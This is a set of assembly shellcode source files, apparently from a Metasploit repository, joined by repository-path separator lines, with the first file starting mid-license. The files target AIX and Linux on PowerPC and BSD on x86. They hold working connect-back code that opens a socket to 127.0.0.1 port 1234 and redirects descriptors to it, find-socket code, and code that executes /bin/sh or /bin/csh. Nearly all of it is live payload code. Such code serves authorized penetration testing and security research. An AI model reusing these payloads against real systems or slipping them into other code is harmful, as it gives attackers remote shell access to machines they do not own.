* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
# xor. %r31,%r31,%r31
xor. %r5,%r5,%r5
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+36(%r30)
mtctr %r30
bctr
.long 0xff0204d2
.long 0x7f000001
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
cntsockcode:
lil %r29,__CAL
# socket
# xor %r5,%r5,%r5
cal %r4,-__CAL+1(%r29)
cal %r3,-__CAL+2(%r29)
cal %r2,__NC_socket(%r29)
mtctr %r30
bctrl
mr %r28,%r3
# connect
cal %r5,-__CAL+16(%r29)
cal %r4,-8(%r30)
cal %r2,__NC_connect(%r29)
mtctr %r30
bctrl
# close
cal %r27,-__CAL+2(%r29)
0:
mr %r3,%r27
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r27
xor %r4,%r4,%r4
mr %r3,%r28
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r27,%r27,-1
bge 0b
shellcode:
# lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,323 | external/source/unixasm/lin-power-cntsockcode.S | /*
* lin-power-cntsockcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
#include "linux-power.h"
.globl main
main:
cntsockcode:
xor %r31,%r31,%r31
lil %r29,__CAL
# socket
cal %r28,-511+1(%r29)
cal %r27,-511+2(%r29)
stu %r31,-4(%r1)
stu %r28,-4(%r1)
stu %r27,-4(%r1)
mr %r4,%r1
cal %r3,__NC_socket(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
mr %r26,%r3
# connect
cal %r25,-511+16(%r29)
/*
* The following GPRs result in zeros when used with liu instruction.
* %r24, %r16, %r8, %r0
*
*/
liu %r23,0x7f00
oril %r23,%r23,0x0001
lil %r22,0x04d2
stu %r23,-4(%r1)
stu %r22,-4(%r1)
st %r27,-2(%r1)
mr %r21,%r1
stu %r25,-4(%r1)
stu %r21,-4(%r1)
stu %r26,-4(%r1)
mr %r4,%r1
cal %r3,__NC_connect(%r29)
cal %r0,__NC_socketcall(%r29)
.long 0x44ffff02
0:
# dup2
mr %r4,%r27
mr %r3,%r26
cal %r0,__NC_dup2(%r29)
.long 0x44ffff02
ai. %r27,%r27,-1
bge 0b
shellcode:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+36(%r30)
stb %r5,-511+43(%r30)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
# cal %r0,__NC_execve(%r31)
cal %r0,__NC_execve(%r29)
.long 0x44ffff02
.asciz "/bin/sh"
|
OpenWireSec/metasploit | 1,605 | external/source/unixasm/aix-power-shellcode.S | /*
* aix-power-shellcode.S
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Supported AIX versions:
*
* -DAIX614 AIX Version 6.1.4
* -DAIX613 AIX Version 6.1.3
* -DAIX612 AIX Version 6.1.2
* -DAIX611 AIX Version 6.1.1
* -DAIX5310 AIX Version 5.3.10
* -DAIX539 AIX Version 5.3.9
* -DAIX538 AIX Version 5.3.8
* -DAIX537 AIX Version 5.3.7
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
shellcode:
lil %r29,__CAL
xor. %r5,%r5,%r5
bnel shellcode
mflr %r30
cal %r30,511(%r30)
cal %r3,-511+40(%r30)
stb %r5,-511+48(%r30)
stu %r5,-4(%r1)
stu %r3,-4(%r1)
mr %r4,%r1
cal %r2,__NC_execve(%r29)
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 2,828 | external/source/unixasm/aix-power-fndsockcode64.S | /*
* $Id: aix-power-fndsockcode64.S 40 2008-11-17 02:45:30Z ramon $
*
* aix-power-fndsockcode64.S - AIX Power Find socket code
* Copyright 2008 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
/*
* Compile with the following command.
* $ gcc -Wall -DAIXLEVEL -m64 -o aix-power-fndsockcode64
* aix-power-fndsockcode64.S
*
* Where AIXLEVEL is one of the currently supported AIX levels.
* -DV530 AIX 5.3.0
*
*/
#include "aix-power.h"
.globl .main
.csect .text[PR]
.main:
syscallcode:
xor. %r31,%r31,%r31
bnel syscallcode
mflr %r30
cal %r30,511(%r30)
cal %r30,-511+28(%r30)
mtctr %r30
bctr
crorc %cr6,%cr6,%cr6
.long 0x44ffff02
cal %r30,-8(%r30)
fndsockcode:
lil %r29,__CAL
# getpeername
stu %r31,-4(%r1)
mr %r28,%r1
cal %r27,-511+44(%r29)
stu %r27,-4(%r1)
mr %r27,%r1
0:
cal %r31,511(%r31)
cal %r31,-511+1(%r31)
mr %r5,%r27
mr %r4,%r28
mr %r3,%r31
cal %r2,__NC_getpeername(%r29)
mtctr %r30
bctrl
cal %r26,511(%r28)
lhz %r26,-511+2(%r26)
cmpli 0,%r26,1234
bne 0b
# close
cal %r25,-511+2(%r29)
1:
mr %r3,%r25
cal %r2,__NC_close(%r29)
mtctr %r30
bctrl
# kfcntl
mr %r5,%r25
xor %r4,%r4,%r4
mr %r3,%r31
cal %r2,__NC_kfcntl(%r29)
mtctr %r30
bctrl
ai. %r25,%r25,-1
bge 1b
shellcode64:
# lil %r31,__CAL
xor. %r5,%r5,%r5
bnel shellcode64
# mflr %r30
# cal %r30,511(%r30)
# cal %r3,-511+40(%r30)
# stb %r5,-511+48(%r30)
mflr %r24
cal %r24,511(%r24)
cal %r3,-511+40(%r24)
stb %r5,-511+48(%r24)
stdu %r5,-8(%r1)
stdu %r3,-8(%r1)
mr %r4,%r1
# cal %r2,__NC_execve(%r31)
cal %r2,__NC_execve(%r29)
# crorc %cr6,%cr6,%cr6
# .long 0x44ffff02
mtctr %r30
bctrl
.asciz "/bin/csh"
|
OpenWireSec/metasploit | 1,566 | external/source/unixasm/bsd-x86-cntsockcode.s | /*
* bsd-x86-cntsockcode.s
* Copyright 2004 Ramon de Carvalho Valle <ramon@risesecurity.org>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public
* License as published by the Free Software Foundation; either
* version 2.1 of the License, or (at your option) any later version.
*
* This library is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
*
*/
.global _start
_start:
# 64 bytes
cntsockcode:
pushl $0x0100007f
pushl $0xd20402ff
movl %esp,%edi
xorl %eax,%eax
pushl %eax
pushl $0x01
pushl $0x02
pushl $0x10
movb $0x61,%al
int $0x80
pushl %edi
pushl %eax
pushl %eax
pushl $0x62
popl %eax
int $0x80
pushl %eax
0:
pushl $0x5a
popl %eax
int $0x80
decl -0x18(%edi)
jns 0b
shellcode:
# xorl %eax,%eax
# pushl %eax
pushl $0x68732f2f
pushl $0x6e69622f
movl %esp,%ebx
pushl %eax
pushl %esp
pushl %ebx
pushl %eax
movb $0x3b,%al
int $0x80
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.